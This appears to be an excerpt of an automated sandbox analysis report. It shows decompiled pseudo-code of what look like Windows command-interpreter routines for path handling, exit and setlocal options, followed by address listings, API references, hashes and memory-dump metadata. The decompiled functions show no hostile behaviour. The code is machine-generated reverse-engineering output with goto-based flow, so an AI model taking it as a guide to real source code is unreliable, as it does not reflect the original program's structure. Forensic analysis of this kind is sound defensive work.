										_t241 =  &(_t188[1]);
										do {
											_t128 =  *_t188;
											_t188 =  &(_t188[1]);
											__eflags = _t128 - _v556;
										} while (_t128 != _v556);
										_t52 = _t217 + 1; // -1
										__eflags = _t52 + (_t188 - _t241 >> 1) - 0x7fe7;
										if(__eflags > 0) {
											goto L49;
										}
										_t217 = _a16;
										E011E18C0(_t162, _a16, _t256);
									}
									__imp__??_V@YAXPAX@Z(_v28);
									_pop(_t242);
									return E011E6FD0(0, _t162, _v8 ^ _t260, _t217, _t242, _t256);
								}
								_t136 = GetLastError();
								 *0x1213cf0 = _t136;
								if(_t136 == 0 || _t136 == 2) {
									goto L36;
								} else {
									__eflags = _t136 - 3;
									if(__eflags == 0) {
										goto L36;
									}
									_t170 = _t136;
									goto L48;
								}
							}
							do {
								_t137 = _t182;
								_t182 =  &(_t182[1]);
							} while ( *_t182 != 0);
							_t217 =  *_t137 & 0x0000ffff;
							goto L32;
						}
					}
					_t199 = _t254;
					if( *((intOrPtr*)(E011DD7E6(_t199))) != 0) {
						goto L46;
					}
					_t217 =  &(_t199[1]);
					do {
						_t146 =  *_t199;
						_t199 =  &(_t199[1]);
					} while (_t146 != 0);
					if(_t199 - _t217 >> 1 > 0x7fe7) {
						goto L49;
					}
					_t244 = _t254;
					_t27 =  &(_t244[1]); // -1
					_t202 = _t27;
					do {
						_t147 =  *_t244;
						_t244 =  &(_t244[1]);
					} while (_t147 != 0);
					_t246 = _t244 - _t202 >> 1;
					_t148 = E011E22C0(_t162, _t254);
					_t28 = _t246 + 1; // -4
					E011E1040(_t254, _t28, _t148);
					_t150 = _t254[1] & 0x0000ffff;
					_t227 = 0x3a;
					if(_t150 != _t227) {
						_t205 = 0x5c;
						__eflags =  *_t254 - _t205;
						if( *_t254 != _t205) {
							L61:
							_t206 = _v28;
							__eflags = _t206;
							if(_t206 == 0) {
								_t206 =  &_v548;
							}
							 *_t206 =  *((intOrPtr*)( *0x1213cec));
							_t153 = _v28;
							__eflags = _t153;
							if(_t153 == 0) {
								_t153 =  &_v548;
							}
							 *((short*)(_t153 + 2)) = _t227;
							_t154 = _v28;
							__eflags = _t154;
							if(_t154 == 0) {
								_t154 =  &_v548;
							}
							 *((short*)(_t154 + 4)) = 0;
							_t208 = _v28;
							__eflags = _t208;
							if(_t208 == 0) {
								_t208 =  &_v548;
							}
							_t228 = _t208 + 2;
							__eflags = 0;
							do {
								_t155 =  *_t208;
								_t208 = _t208 + 2;
								__eflags = _t155;
							} while (_t155 != 0);
							_t209 = _t208 - _t228;
							__eflags = _t209;
							_t229 = _t254;
							_t210 = _t209 >> 1;
							_t73 =  &(_t229[1]); // 0x1
							_t248 = _t73;
							do {
								_t156 =  *_t229;
								_t229 =  &(_t229[1]);
								__eflags = _t156 - _v556;
							} while (_t156 != _v556);
							_t217 = _t229 - _t248 >> 1;
							__eflags = _t210 + 1 + (_t229 - _t248 >> 1) - 0x7fe7;
							if(__eflags > 0) {
								goto L49;
							}
							E011E0CF2(_t217, _t254);
							goto L19;
						}
						__eflags = _t150 - _t205;
						if(_t150 == _t205) {
							goto L18;
						}
						goto L61;
					}
					L18:
					E011E0D89(_t227, _t254);
					goto L19;
				} else {
					goto L1;
				}
				do {
					L1:
					_t161 =  *_t162 & 0x0000ffff;
					_t162 =  &(_t162[1]);
				} while (_t161 != 0);
				goto L2;
			}




















































































                                                    0x011e5fd3
                                                    0x011e5fda
                                                    0x011e5fe0
                                                    0x011e5fea
                                                    0x011e5ff6
                                                    0x011e6005
                                                    0x011e6007
                                                    0x011e6016
                                                    0x011e6023
                                                    0x011e602e
                                                    0x011e603b
                                                    0x011e6048
                                                    0x011e6048
                                                    0x011e604a
                                                    0x011e604c
                                                    0x011e604c
                                                    0x011e604f
                                                    0x011e604f
                                                    0x011e6052
                                                    0x011e6055
                                                    0x011e605a
                                                    0x011e605c
                                                    0x011e605e
                                                    0x011ef576
                                                    0x011ef576
                                                    0x011ef57f
                                                    0x011ef57f
                                                    0x011ef584
                                                    0x011ef584
                                                    0x00000000
                                                    0x011ef584
                                                    0x011e606a
                                                    0x00000000
                                                    0x00000000
                                                    0x011e6070
                                                    0x011e6072
                                                    0x011e6072
                                                    0x011e6075
                                                    0x011e6075
                                                    0x011e6078
                                                    0x011e607b
                                                    0x011e6084
                                                    0x011e6086
                                                    0x011e608c
                                                    0x011e608c
                                                    0x011e6091
                                                    0x011e6098
                                                    0x011e60a3
                                                    0x011e60a8
                                                    0x011ef58b
                                                    0x00000000
                                                    0x011ef58b
                                                    0x011e60b0
                                                    0x011e60b9
                                                    0x011e60c4
                                                    0x011e60c8
                                                    0x011e60ee
                                                    0x011ef593
                                                    0x00000000
                                                    0x011ef593
                                                    0x011e60f7
                                                    0x011e60fd
                                                    0x011ef59a
                                                    0x011ef59d
                                                    0x011ef59f
                                                    0x011ef5a1
                                                    0x011ef5a1
                                                    0x011ef5af
                                                    0x011ef5b2
                                                    0x011ef5b5
                                                    0x011ef5b7
                                                    0x011ef5b9
                                                    0x011ef5b9
                                                    0x011ef5c1
                                                    0x011ef5c2
                                                    0x011ef5c6
                                                    0x011ef5c9
                                                    0x011ef5cb
                                                    0x011ef5cd
                                                    0x011ef5cd
                                                    0x011ef5d5
                                                    0x011e6175
                                                    0x011e6175
                                                    0x011e6178
                                                    0x011e617a
                                                    0x011e618a
                                                    0x00000000
                                                    0x00000000
                                                    0x011e6190
                                                    0x011e619e
                                                    0x011e61a2
                                                    0x011e61aa
                                                    0x011e61ae
                                                    0x011ef685
                                                    0x011e61b4
                                                    0x011e61b4
                                                    0x011e61b4
                                                    0x011e61bb
                                                    0x011e61c6
                                                    0x011e61ca
                                                    0x011e61ca
                                                    0x011e61de
                                                    0x011e61de
                                                    0x011e61e3
                                                    0x011e61e8
                                                    0x011ef690
                                                    0x011ef690
                                                    0x011e61ee
                                                    0x011e61f6
                                                    0x011e61fa
                                                    0x011e6201
                                                    0x00000000
                                                    0x011e6207
                                                    0x011e6208
                                                    0x011e620a
                                                    0x011e620f
                                                    0x011e6215
                                                    0x011e621d
                                                    0x011e621f
                                                    0x011e6221
                                                    0x011e6224
                                                    0x011e6229
                                                    0x011e623a
                                                    0x011e623c
                                                    0x011e6240
                                                    0x011ef69b
                                                    0x011ef69f
                                                    0x011ef69f
                                                    0x011ef6a0
                                                    0x011ef6a3
                                                    0x011ef6a3
                                                    0x011ef6a6
                                                    0x011ef6a9
                                                    0x011ef6a9
                                                    0x011ef6b8
                                                    0x011ef6b8
                                                    0x011e6247
                                                    0x011e6250
                                                    0x011e628d
                                                    0x011e628f
                                                    0x011e6294
                                                    0x011e6296
                                                    0x011e6296
                                                    0x011e626a
                                                    0x011e626c
                                                    0x011e62a2
                                                    0x011e62a5
                                                    0x011e62aa
                                                    0x011e62ac
                                                    0x011e62ae
                                                    0x011e62b0
                                                    0x011e62b0
                                                    0x011e62b3
                                                    0x011e62b3
                                                    0x011e62b6
                                                    0x011e62b9
                                                    0x011e62b9
                                                    0x011e62be
                                                    0x011e62c0
                                                    0x011e62c0
                                                    0x011e62c2
                                                    0x011e62c4
                                                    0x011e62c7
                                                    0x011e62c7
                                                    0x011e62ca
                                                    0x011e62cd
                                                    0x011e62cd
                                                    0x011e62d8
                                                    0x011e62df
                                                    0x011e62e4
                                                    0x00000000
                                                    0x00000000
                                                    0x011e62ea
                                                    0x011e62f0
                                                    0x011e62f0
                                                    0x011e6271
                                                    0x011e627d
                                                    0x011e628a
                                                    0x011e628a
                                                    0x011e6252
                                                    0x011e6258
                                                    0x011e625f
                                                    0x00000000
                                                    0x011ef6c2
                                                    0x011ef6c2
                                                    0x011ef6c5
                                                    0x00000000
                                                    0x00000000
                                                    0x011ef57d
                                                    0x00000000
                                                    0x011ef57d
                                                    0x011e625f
                                                    0x011e622d
                                                    0x011e622d
                                                    0x011e622f
                                                    0x011e6232
                                                    0x011e6237
                                                    0x00000000
                                                    0x011e6237
                                                    0x011e6201
                                                    0x011e6103
                                                    0x011e610d
                                                    0x00000000
                                                    0x00000000
                                                    0x011e6113
                                                    0x011e6116
                                                    0x011e6116
                                                    0x011e6119
                                                    0x011e611c
                                                    0x011e612b
                                                    0x00000000
                                                    0x00000000
                                                    0x011e6131
                                                    0x011e6135
                                                    0x011e6135
                                                    0x011e6138
                                                    0x011e6138
                                                    0x011e613b
                                                    0x011e613e
                                                    0x011e6147
                                                    0x011e6149
                                                    0x011e614f
                                                    0x011e6154
                                                    0x011e6159
                                                    0x011e615f
                                                    0x011e6163
                                                    0x011ef5e0
                                                    0x011ef5e1
                                                    0x011ef5e4
                                                    0x011ef5ef
                                                    0x011ef5ef
                                                    0x011ef5f2
                                                    0x011ef5f4
                                                    0x011ef5f6
                                                    0x011ef5f6
                                                    0x011ef604
                                                    0x011ef607
                                                    0x011ef60a
                                                    0x011ef60c
                                                    0x011ef60e
                                                    0x011ef60e
                                                    0x011ef614
                                                    0x011ef618
                                                    0x011ef61b
                                                    0x011ef61d
                                                    0x011ef61f
                                                    0x011ef61f
                                                    0x011ef627
                                                    0x011ef62b
                                                    0x011ef62e
                                                    0x011ef630
                                                    0x011ef632
                                                    0x011ef632
                                                    0x011ef638
                                                    0x011ef63b
                                                    0x011ef63d
                                                    0x011ef63d
                                                    0x011ef640
                                                    0x011ef643
                                                    0x011ef643
                                                    0x011ef648
                                                    0x011ef648
                                                    0x011ef64a
                                                    0x011ef64c
                                                    0x011ef64e
                                                    0x011ef64e
                                                    0x011ef651
                                                    0x011ef651
                                                    0x011ef654
                                                    0x011ef657
                                                    0x011ef657
                                                    0x011ef665
                                                    0x011ef669
                                                    0x011ef66e
                                                    0x00000000
                                                    0x00000000
                                                    0x011ef67b
                                                    0x00000000
                                                    0x011ef67b
                                                    0x011ef5e6
                                                    0x011ef5e9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ef5e9
                                                    0x011e6169
                                                    0x011e6170
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e603d
                                                    0x011e603d
                                                    0x011e603d
                                                    0x011e6040
                                                    0x011e6043
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 011E3320: _wcsnicmp.MSVCRT ref: 011E33A4
                                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                                      • Part of subcall function 011E62FA: _wcsnicmp.MSVCRT ref: 011E6367
                                                      • Part of subcall function 011E62FA: _wcsnicmp.MSVCRT ref: 011EF6F6
                                                    • memset.MSVCRT ref: 011E60C8
                                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00007EE3,00000001), ref: 011E620F
                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011E6247
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011E6252
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E6271
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                                    • String ID: COPYCMD
                                                    • API String ID: 1068965577-3727491224
                                                    • Opcode ID: 74bda750c58123a4ff90193598c03149eaec80dfcd030348955cd581489125b5
                                                    • Instruction ID: 483a9fdbe8bd90f742b05a9b1b168e19983e5bc8bc7b47db92ee463cf8520405
                                                    • Opcode Fuzzy Hash: 74bda750c58123a4ff90193598c03149eaec80dfcd030348955cd581489125b5
                                                    • Instruction Fuzzy Hash: 9BD1E635A009178BCB2DDFA8D8986BAB7F5EFA8304F454569DC06D7295EB30DE42CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D5E70, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 292COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 44%
                                                    			E011D5E70(void* __ecx, signed int* _a4) {
				signed int _v8;
				short _v24;
				short _v26;
				short _v28;
				signed short _v29;
				signed int _v36;
				signed int _v40;
				signed short* _v44;
				intOrPtr _v48;
				int _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t88;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				signed int _t100;
				intOrPtr _t104;
				signed int _t107;
				short* _t117;
				signed int _t118;
				signed short* _t120;
				signed short _t122;
				signed int _t124;
				signed int _t129;
				signed int _t132;
				signed short _t133;
				signed int _t135;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				short _t148;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t162;
				void* _t163;
				signed short _t165;
				signed short _t170;
				void* _t173;
				signed int _t174;
				void* _t177;
				intOrPtr _t178;
				void* _t189;
				signed short* _t200;
				signed int _t204;
				void* _t205;
				void* _t206;
				signed int* _t212;
				void* _t213;
				void* _t214;
				signed int _t216;
				wchar_t* _t219;
				int _t220;
				void* _t221;
				void* _t223;
				signed int* _t225;
				signed int _t230;
				signed int _t234;

				_t230 = _t234;
				_push(__ecx);
				_push(__ecx);
				_t212 = _a4;
				_t162 = 0;
				_t219 = _t212[0xf];
				if(_t219 == 0) {
					L15:
					if( *_t212 != 0x14) {
						goto L65;
					} else {
						goto L16;
					}
				} else {
					_t205 = 0x20;
					while(1) {
						_t80 =  *_t219 & 0x0000ffff;
						if(_t80 == 0 || _t80 > _t205) {
							break;
						}
						_t219 =  &(_t219[0]);
						__eflags = _t219;
						if(_t219 != 0) {
							continue;
						} else {
						}
						break;
					}
					if(_t219 == 0) {
						goto L15;
					} else {
						__imp___wcsnicmp(_t219, L"/B", 2);
						_t234 = _t234 + 0xc;
						if(_t80 != 0) {
							L11:
							if(_t219 != 0) {
								_t80 = swscanf(_t219, L"%d",  &_v8);
								_t234 = _t234 + 0xc;
								if(_t80 == 1) {
									_t80 = _v8;
									 *0x120b8b0 = _t80;
									if( *0x1213ccc != _t162) {
										_t162 = _t80;
									}
								}
							}
							goto L15;
						} else {
							 *_t212 = 0x14;
							_t212[0xf] = L":EOF";
							_t219 =  &(_t219[1]);
							if(_t219 == 0) {
								L16:
								if( *0x1213cc4 == 0) {
									L65:
									_t170 =  *0x1203874;
									E011DC7F7(_t80, _t170);
									_t220 =  *0x120b8b0;
									do {
										__eflags = E011E4B60(__eflags, 0);
									} while (__eflags == 0);
									exit(_t220);
									asm("int3");
									_t83 =  *(_t162 + 0xc);
									__eflags = _t83;
									if(_t83 != 0) {
										do {
											_t216 = _t83;
											_v40 = _t216;
											_t83 =  *(_t216 + 0xc);
											__eflags = _t83;
										} while (_t83 != 0);
										_t212 = _v36;
										_t162 = _v40;
									}
									_t84 =  *_t220 & 0x0000ffff;
									__eflags = _t84;
									if(_t84 == 0) {
										L38:
										_t85 = 0;
										__eflags = 0;
										goto L39;
									} else {
										while(1) {
											_t207 = 0x2f;
											_v29 = _t170;
											__eflags = _t84 - _t207;
											if(_t84 != _t207) {
												goto L36;
											}
											_t7 = _t220 + 4; // 0x4
											_t117 = _t7;
											_t165 = _t170;
											__eflags =  *_t117 - 0x2d;
											_v52 = _t117;
											if( *_t117 == 0x2d) {
												_v29 = 1;
												_t165 = 1;
											}
											_t118 = _t165 & 0x0000ffff;
											_v36 = _t118;
											_t120 = _t220 + (_t118 + 2) * 2;
											_v44 = _t120;
											_t122 = towupper( *_t120 & 0x0000ffff);
											_pop(_t196);
											_t124 = (_t122 & 0x0000ffff) - 0x3f;
											__eflags = _t124;
											if(__eflags == 0) {
												E011F9373(_t207, __eflags);
												__eflags = 0;
												_push(0);
												_push(0x2381);
												E011DC108(_t196);
												 *0x1218065 = 0;
												 *0x121851c = 0;
												goto L93;
											} else {
												_t129 = _t124;
												__eflags = _t129;
												if(_t129 == 0) {
													__eflags = _v29;
													if(_v29 == 0) {
														_t207 = _t212;
														_t132 = E011F9CFA(_t220 + (_v36 + 3) * 2, _t212);
														__eflags = _t132;
														if(_t132 != 0) {
															goto L93;
														} else {
															__eflags = _t212[2] & 0x00000001;
															if((_t212[2] & 0x00000001) != 0) {
																 *_t212 =  *_t212 | 0x00001000;
															}
															goto L33;
														}
													} else {
														_t200 = _v44;
														_t207 =  &(_t200[1]);
														do {
															_t133 =  *_t200;
															_t200 =  &(_t200[1]);
															__eflags = _t133 - _v48;
														} while (_t133 != _v48);
														_t196 = _t200 - _t207 >> 1;
														__eflags = _t200 - _t207 >> 1 - 1;
														if(_t200 - _t207 >> 1 > 1) {
															goto L89;
														} else {
															_t212[1] = 6;
															_t212[2] = 0;
															goto L33;
														}
													}
												} else {
													_t139 = _t129 - 5;
													__eflags = _t139;
													if(_t139 == 0) {
														__eflags = _v29;
														_t140 =  *_t212;
														if(_v29 != 0) {
															_t141 = _t140 ^ 0x00001000;
														} else {
															_t141 = _t140 | 0x00001000;
															__eflags = _t141;
														}
														goto L32;
													} else {
														_t143 = _t139 - 0xa;
														__eflags = _t143;
														if(_t143 == 0) {
															__eflags = _v29;
															_t144 =  *_t212;
															if(_v29 == 0) {
																_t141 = _t144 | 0x00000800;
															} else {
																_t141 = _t144 ^ 0x00000800;
															}
															goto L32;
														} else {
															_t145 = _t143 - 1;
															__eflags = _t145;
															if(_t145 != 0) {
																__eflags = _t145 != 0;
																if(_t145 != 0) {
																	_t148 = 0x2f;
																	_v28 = _t148;
																	_v26 =  *((intOrPtr*)(_t220 + 4));
																	_v24 = 0;
																	_push(_t220 + ((_t165 & 0x0000ffff) + 2) * 2);
																	_push(1);
																	_push(0x2375);
																	goto L91;
																} else {
																	__eflags = _v29;
																	_t154 =  *_t212;
																	if(_v29 != 0) {
																		_t155 = _t154 ^ 0x00000010;
																	} else {
																		_t155 = _t154 | 0x00000010;
																		__eflags = _t155;
																	}
																	 *_t212 = _t155;
																	_t156 = _v36;
																	__eflags =  *(_t220 + 6 + _t156 * 2);
																	if( *(_t220 + 6 + _t156 * 2) == 0) {
																		goto L33;
																	} else {
																		_t204 = (_t165 & 0x0000ffff) + 2;
																		_t196 = _t220 + _t204 * 2;
																		_push(_t220 + _t204 * 2);
																		goto L90;
																	}
																}
															} else {
																__eflags = _v29;
																_t157 =  *_t212;
																if(_v29 != 0) {
																	_t141 = _t157 ^ 0x00002000;
																} else {
																	_t141 = _t157 | 0x00002000;
																}
																L32:
																 *_t212 = _t141;
																_t196 = 0;
																_t142 = _v36;
																__eflags =  *(_t220 + 6 + _t142 * 2);
																if( *(_t220 + 6 + _t142 * 2) != 0) {
																	L89:
																	_t135 = (_t165 & 0x0000ffff) + 2;
																	__eflags = _t135;
																	_push(_t220 + _t135 * 2);
																	L90:
																	_push(1);
																	_push(0x2376);
																	L91:
																	E011DC5A2(_t196);
																	L93:
																	_t85 = 1;
																	L39:
																	_pop(_t213);
																	_pop(_t221);
																	__eflags = _v8 ^ _t230;
																	_pop(_t163);
																	return E011E6FD0(_t85, _t163, _v8 ^ _t230, _t207, _t213, _t221);
																} else {
																	L33:
																	_t220 = _v52;
																	_t162 = _v40;
																	L34:
																	_t220 = E011DD7E6(_t220);
																	_t84 =  *_t220 & 0x0000ffff;
																	__eflags = _t84;
																	if(_t84 == 0) {
																		goto L38;
																	} else {
																		_t170 = 0;
																		continue;
																	}
																}
															}
														}
													}
												}
											}
											goto L101;
											L36:
											_t87 = _t212[0x12];
											__eflags = _t87;
											if(_t87 != 0) {
												_t173 = 0x10;
												_t88 = E011E00B0(_t173);
												__eflags = _t88;
												if(_t88 == 0) {
													E011F9287(_t173);
													__imp__longjmp(0x120b8b8, 1);
													asm("int3");
													_t174 = 0x1213ab0;
													__eflags = 0;
													do {
														_t90 =  *_t174;
														_t174 = _t174 + 2;
														__eflags = _t90;
													} while (_t90 != 0);
													_t214 = (_t174 - 0x1213ab2 >> 1) + 1;
													_t223 = HeapAlloc(GetProcessHeap(), 8, 0xc);
													__eflags = _t223;
													if(_t223 == 0) {
														L95:
														_t94 = 1;
													} else {
														_t177 = HeapAlloc(GetProcessHeap(), 8, _t214 + _t214);
														 *_t223 = _t177;
														__eflags = _t177;
														if(_t177 == 0) {
															goto L95;
														} else {
															_t98 =  *0x1213cb8;
															__eflags = _t98;
															if(_t98 == 0) {
																_t98 = 0x1213ab0;
															}
															E011E1040(_t177, _t214, _t98);
															_t100 = E011E3B2C(_t177);
															 *(_t223 + 4) = _t100;
															__eflags = _t100;
															if(_t100 == 0) {
																goto L95;
															} else {
																_t178 =  *0x1213cc4;
																 *((char*)(_t223 + 8)) =  *0x1213cc9;
																 *((char*)(_t223 + 9)) =  *0x1213cc8;
																 *(_t178 + 0x90 +  *(_t178 + 0x14) * 4) = _t223;
																_t104 =  *0x1213cd8;
																 *(_t178 + 0x14) =  *(_t178 + 0x14) + 1;
																 *((intOrPtr*)(_t178 + 0xc)) = _t104;
																__eflags =  *((intOrPtr*)(_t178 + 0x10)) - _t104;
																if( *((intOrPtr*)(_t178 + 0x10)) < _t104) {
																	 *((intOrPtr*)(_t178 + 0x10)) = _t104;
																}
																_t225 = E011DEA40( *((intOrPtr*)( *((intOrPtr*)(_t162 + 8)) + 0x3c)), 0, 0);
																_t107 = 0;
																 *0x120b8b0 = 0;
																while(1) {
																	__eflags =  *_t225 - _t107;
																	if( *_t225 == _t107) {
																		break;
																	}
																	__imp___wcsicmp(_t225, L"ENABLEEXTENSIONS");
																	__eflags = _t107;
																	if(_t107 != 0) {
																		__imp___wcsicmp(_t225, L"DISABLEEXTENSIONS");
																		__eflags = _t107;
																		if(_t107 == 0) {
																			 *0x1213cc9 = 0;
																			goto L58;
																		} else {
																			__imp___wcsicmp(_t225, L"ENABLEDELAYEDEXPANSION");
																			__eflags = _t107;
																			if(_t107 != 0) {
																				__imp___wcsicmp(L"DISABLEDELAYEDEXPANSION");
																				_t189 = _t225;
																				__eflags = _t107;
																				if(_t107 != 0) {
																					__eflags =  *_t225;
																					if( *_t225 == 0) {
																						goto L58;
																					} else {
																						_push(0);
																						_push(0x400023a6);
																						E011DC5A2(_t189);
																						_t94 = 1;
																						 *0x120b8b0 = 1;
																					}
																				} else {
																					 *0x1213cc8 = _t107;
																					goto L58;
																				}
																			} else {
																				 *0x1213cc8 = 1;
																				goto L58;
																			}
																		}
																	} else {
																		 *0x1213cc9 = 1;
																		L58:
																		_t225 = E011DD7E6(_t225);
																		_t107 = 0;
																		__eflags = 0;
																		continue;
																	}
																	goto L63;
																}
																_t94 = 0;
																__eflags = 0;
															}
														}
													}
													L63:
													return _t94;
												} else {
													 *(_t162 + 0xc) = _t88;
													_t162 = _t88;
													 *((intOrPtr*)(_t88 + 0xc)) = 0;
													_t87 = _t212[0x12];
													_v40 = _t162;
													goto L37;
												}
											} else {
												L37:
												_t212[0x12] = _t87 + 1;
												 *_t162 = E011E297B(E011E22C0(_t162, _t220));
												 *((char*)(_t162 + 8)) = 1;
												goto L34;
											}
											goto L101;
										}
									}
								} else {
									E011D6980(_t212);
									return _t162;
								}
							} else {
								_t206 = 0x20;
								while(1) {
									_t80 =  *_t219 & 0x0000ffff;
									if(_t80 == 0 || _t80 > _t206) {
										goto L11;
									}
									_t219 =  &(_t219[0]);
									if(_t219 != 0) {
										continue;
									}
									goto L11;
								}
								goto L11;
							}
						}
					}
				}
				L101:
			}









































































                                                    0x011d5e73
                                                    0x011d5e75
                                                    0x011d5e76
                                                    0x011d5e7a
                                                    0x011d5e7d
                                                    0x011d5e7f
                                                    0x011d5e84
                                                    0x011d5f0d
                                                    0x011d5f10
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d5e8a
                                                    0x011d5e8c
                                                    0x011d5e8d
                                                    0x011d5e8d
                                                    0x011d5e93
                                                    0x00000000
                                                    0x00000000
                                                    0x011d5f35
                                                    0x011d5f35
                                                    0x011d5f38
                                                    0x00000000
                                                    0x00000000
                                                    0x011d5f3e
                                                    0x00000000
                                                    0x011d5f38
                                                    0x011d5ea0
                                                    0x00000000
                                                    0x011d5ea2
                                                    0x011d5eaa
                                                    0x011d5eb0
                                                    0x011d5eb5
                                                    0x011d5edf
                                                    0x011d5ee1
                                                    0x011d5eed
                                                    0x011d5ef3
                                                    0x011d5ef9
                                                    0x011d5efb
                                                    0x011d5efe
                                                    0x011d5f09
                                                    0x011d5f0b
                                                    0x011d5f0b
                                                    0x011d5f09
                                                    0x011d5ef9
                                                    0x00000000
                                                    0x011d5eb7
                                                    0x011d5eb7
                                                    0x011d5ebd
                                                    0x011d5ec4
                                                    0x011d5ec7
                                                    0x011d5f16
                                                    0x011d5f1d
                                                    0x011ea76e
                                                    0x011ea76e
                                                    0x011ea774
                                                    0x011ea779
                                                    0x011ea77f
                                                    0x011ea786
                                                    0x011ea786
                                                    0x011ea78b
                                                    0x011ea791
                                                    0x011ea792
                                                    0x011ea795
                                                    0x011ea797
                                                    0x011ea79d
                                                    0x011ea79d
                                                    0x011ea79f
                                                    0x011ea7a2
                                                    0x011ea7a5
                                                    0x011ea7a5
                                                    0x011ea7a9
                                                    0x011ea7ac
                                                    0x011ea7ac
                                                    0x011dc2db
                                                    0x011dc2de
                                                    0x011dc2e1
                                                    0x011dc3c8
                                                    0x011dc3c8
                                                    0x011dc3c8
                                                    0x00000000
                                                    0x00000000
                                                    0x011dc2e7
                                                    0x011dc2e9
                                                    0x011dc2ea
                                                    0x011dc2ed
                                                    0x011dc2f0
                                                    0x00000000
                                                    0x00000000
                                                    0x011dc2f6
                                                    0x011dc2f6
                                                    0x011dc2f9
                                                    0x011dc2fb
                                                    0x011dc2ff
                                                    0x011dc302
                                                    0x011ea7b6
                                                    0x011ea7ba
                                                    0x011ea7ba
                                                    0x011dc308
                                                    0x011dc30b
                                                    0x011dc311
                                                    0x011dc314
                                                    0x011dc31b
                                                    0x011dc324
                                                    0x011dc325
                                                    0x011dc325
                                                    0x011dc328
                                                    0x011ea8c7
                                                    0x011ea8cc
                                                    0x011ea8ce
                                                    0x011ea8cf
                                                    0x011ea8d4
                                                    0x011ea8db
                                                    0x011ea8e1
                                                    0x00000000
                                                    0x011dc32e
                                                    0x011dc32f
                                                    0x011dc32f
                                                    0x011dc332
                                                    0x011ea7f0
                                                    0x011ea7f4
                                                    0x011ea829
                                                    0x011ea831
                                                    0x011ea836
                                                    0x011ea838
                                                    0x00000000
                                                    0x011ea83e
                                                    0x011ea83e
                                                    0x011ea842
                                                    0x011ea848
                                                    0x011ea848
                                                    0x00000000
                                                    0x011ea842
                                                    0x011ea7f6
                                                    0x011ea7f6
                                                    0x011ea7f9
                                                    0x011ea7fc
                                                    0x011ea7fc
                                                    0x011ea7ff
                                                    0x011ea802
                                                    0x011ea802
                                                    0x011ea80a
                                                    0x011ea80c
                                                    0x011ea80f
                                                    0x00000000
                                                    0x011ea815
                                                    0x011ea817
                                                    0x011ea81e
                                                    0x00000000
                                                    0x011ea81e
                                                    0x011ea80f
                                                    0x011dc338
                                                    0x011dc338
                                                    0x011dc338
                                                    0x011dc33b
                                                    0x011dc362
                                                    0x011dc366
                                                    0x011dc368
                                                    0x011ea7e6
                                                    0x011dc36e
                                                    0x011dc36e
                                                    0x011dc36e
                                                    0x011dc36e
                                                    0x00000000
                                                    0x011dc33d
                                                    0x011dc33d
                                                    0x011dc33d
                                                    0x011dc340
                                                    0x011ea7ca
                                                    0x011ea7ce
                                                    0x011ea7d0
                                                    0x011ea7dc
                                                    0x011ea7d2
                                                    0x011ea7d2
                                                    0x011ea7d2
                                                    0x00000000
                                                    0x011dc346
                                                    0x011dc346
                                                    0x011dc346
                                                    0x011dc349
                                                    0x011dc3dc
                                                    0x011dc3df
                                                    0x011ea886
                                                    0x011ea887
                                                    0x011ea88f
                                                    0x011ea895
                                                    0x011ea8a2
                                                    0x011ea8a3
                                                    0x011ea8a5
                                                    0x00000000
                                                    0x011dc3e5
                                                    0x011dc3e5
                                                    0x011dc3e9
                                                    0x011dc3eb
                                                    0x011dc403
                                                    0x011dc3ed
                                                    0x011dc3ed
                                                    0x011dc3ed
                                                    0x011dc3ed
                                                    0x011dc3f0
                                                    0x011dc3f4
                                                    0x011dc3f7
                                                    0x011dc3fc
                                                    0x00000000
                                                    0x011dc3fe
                                                    0x011ea87b
                                                    0x011ea87e
                                                    0x011ea881
                                                    0x00000000
                                                    0x011ea881
                                                    0x011dc3fc
                                                    0x011dc34f
                                                    0x011dc34f
                                                    0x011dc353
                                                    0x011dc355
                                                    0x011ea7c0
                                                    0x011dc35b
                                                    0x011dc35b
                                                    0x011dc35b
                                                    0x011dc373
                                                    0x011dc373
                                                    0x011dc375
                                                    0x011dc377
                                                    0x011dc37a
                                                    0x011dc37f
                                                    0x011ea8ac
                                                    0x011ea8af
                                                    0x011ea8af
                                                    0x011ea8b5
                                                    0x011ea8b6
                                                    0x011ea8b6
                                                    0x011ea8b8
                                                    0x011ea8bd
                                                    0x011ea8bd
                                                    0x011ea8e7
                                                    0x011ea8e9
                                                    0x011dc3ca
                                                    0x011dc3cd
                                                    0x011dc3ce
                                                    0x011dc3cf
                                                    0x011dc3d1
                                                    0x011dc3da
                                                    0x011dc385
                                                    0x011dc385
                                                    0x011dc385
